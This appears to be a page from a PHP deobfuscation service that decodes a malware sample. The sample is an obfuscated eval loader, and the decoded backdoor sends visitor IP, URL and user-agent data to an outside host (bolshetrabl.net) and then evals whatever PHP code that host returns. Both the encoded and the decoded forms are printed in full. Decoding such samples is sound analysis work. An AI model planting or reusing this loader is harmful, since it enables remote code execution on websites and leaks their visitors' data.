Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61..
Decoded Output download
germik();
function germik() {
$a['ip'] = getipik();
$a['url'] = getUrlik();
$cabardin = 'usee';
$d=(strpos($a['url'], 'loopinator')!==false)?true:false;
if($d){echo('function called['.$a['url'].'],['.$cabardin.']');}
if (strpos($a['url'],$cabardin)===false && strpos($a['url'],'ogo=')===false) {
if($d){echo('invalid url');}
return;
}
if($d){echo('fetch url');}
$a['host'] = @$_SERVER['SERVER_NAME'];
$a['agent'] = @$_SERVER['HTTP_USER_AGENT'];
$a['referer'] = @$_SERVER['HTTP_REFERER'];
$eblo = 'http://bolshetrabl.net/ztc/kalin4.php?data='.base64_encode(serialize($a));
if($d){echo('t:['.$eblo.']');}
$c = zzik($eblo);
if($d){var_dump($c);}
if (!$c) {
if($d){echo('empty resulst');}
return;
}
if (strpos($c, '--return--')!==false) {return;}
if (preg_match('%\[p\](.*?)\[/p\]%i',$c,$ret)) {
eval($ret[1]);
exit;
}
echo($c);
exit;
}
function zzik($url) {
$ch = @curl_init($url);
if(!$ch) {
return;
}
@curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
@curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$c = @curl_exec($ch);
if (!$c) {
return;
}
return $c;
}
function getipik() {
if (in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1', 'localhost'))) {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
}
return $_SERVER['REMOTE_ADDR'];
}
function getUrlik() {
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
$scheme = 'https';
} else {
$scheme = 'http';
}
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME'];
if (isset($_SERVER['REQUEST_URI'])) {
$url = $scheme.'://'.$host.$_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['REDIRECT_SCRIPT_URI'])) {
$url = $_SERVER['REDIRECT_SCRIPT_URI'];
if (isset($_SERVER['REDIRECT_QUERY_STRING'])) {
$url .= '?'.$_SERVER['REDIRECT_QUERY_STRING'];
}
} elseif (isset($_SERVER['REQUEST_URI'])) {
$url = $scheme.'://'.$host.$_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['REDIRECT_URL'])) {
$path = $_SERVER['REDIRECT_URL'];
$url = $scheme.'://'.$host.$path;
} else {
$url = $scheme.'://'.$host.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
}
return $url;
}
Did this file decode correctly?
Original Code
preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'nVVrb9owFP0Mv8KV0jmZIJSp2iQQYqikLVILzIQ9RFFkgkuihiRyTNVS8d93HYfwbqepH+pcn+t77rkPZozP/SfdqBcfF6Er/ChEs8yE3ooFjY6wH+MxQg2wCz9W2NS+4AFcpPYhD9YXLp1QPvVDuMCLhDEsjdOGnggeR4meO5YQDqIo9kMqIo6Ns0bjkQYJM5qCL1gtPYOn/6hrU+ONuV6k45yhS4OATUfYzF8z4UH5vY4O39ior+QD6DB0DjMaWVj06RM6gOFoFjVwjkkF2WXkh8808KdI4tNwBc7EgofAfLVPngnX2wBlFC9KhJRWivtdcwYW+WmREVb/nW7r3sLjTGs6Y6HC7kBvbbvvDOHLad1YXTuHc/bIOONpefbhxLq2iEUUlk2CSBHAnhBxrVKZREHiMcHpJDBDJipL4VaeIMnw0oy9uDmlgjawOaEJ+3rpsNCNpkxPGPcBsmQgnmHsl03UZGVkpLwqmgsRl0vomdS+5fJMuTNdzGNdc/P6ncH5UHs2j8Ur4ixZBCDjMfU3lXeh28pldVsub3UbestcMoeYs5kzp1AqHZ8/jOKHsW5+bhoPowocz30MrVPSwMVQhBiUX5ffo+pYJlFgL75Q4VOSMoliZlwVNyOmUodmUEMGjQF1cuHb8UNfqBulCeTuqVjbuSlswkQUA9r1SuhqSO56fRuqaw9J1yat7gDKXKrKZ06j7c691RvaJVS9UMOb82AvzJVYRWOrBts01Blp7m52+aKQDtLZDx3KOX3VN61IrPuebTmtdpvIXaCucfXLN/MC/qo4XQ8w5+mMGMa6/vBWAonoez3927nukV8t0rba8oTHmUPO8AO4LN1qJ6XjRA/yzBZfnugRcgNgI9fLgRU1YOqiECuqWuJ6bM7Wk5jIvblCTO6mI9dYFUCT8oDtqCi3vYEtYzf301cXqIZO75xjyRDrx9Aa2M6QdDKB5eYoyGYFChlBE8MOgXGXxMwTvvXUUSV3PFC7Q6wr2xlckU5/O2Ahj/Y+uH6iWXIwsCF/nIFNOt2bTbekj5sgcRObHzqte+adNPb1KvyXWO+GyKjBPG9ixFR4xzVKYfUPeEj3veb7F9b92z6c767lj/GOfgeybY0ZPCxn6i8='\x29\x29\x29\x3B",".");Function Calls
| gzinflate | 1 |
| preg_replace | 1 |
| base64_decode | 1 |
Stats
| MD5 | 9891640d9ce5161227cea3c2acc92520 |
| Eval Count | 2 |
| Decode Time | 138 ms |